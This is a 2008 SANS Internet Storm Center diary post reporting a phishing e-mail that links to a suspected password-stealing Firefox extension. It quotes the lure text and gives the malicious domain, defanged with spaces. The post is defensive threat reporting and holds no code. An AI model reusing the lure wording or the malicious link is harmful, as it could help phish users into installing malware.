Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: Internet Security | DShield SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms:

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Firefox extension used as password stealer?

A reader sent us a suspicious e-mail, which included a link to an .xpi file (a Firefox extension) as attachement. Looks like a very nice find! I am still looking at the extension. Just from a preliminary glanze at it, the extension may try to steal the content of form fields.

The origin appears to be russian. The link went to ht tp : //qs-s.  nm.  ru (again: inserted spaces to protect the innocent)


The e-mail:

We have received mnoey. Here your book. Read and grow rich!
ht tp:// qs-s. nm. ru - We have received money. Here your book. Read adn grow rich!

(and thanks for the person posting the comment below to point out I forgot to break up the second instance of the URL :-) ).

 Still working on exactly figuring out what this does. E.g. if it is just adware or actually steels passwords. May have to wait until I get home and get to run it in the lab.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


I will be teaching next: Intrusion Detection In-Depth - SANS Doha March 2022


4343 Posts
ISC Handler
Dec 12th 2008
:) but you haven't protect the innocent in the next lines ...

Sign Up for Free or Log In to start participating in the conversation!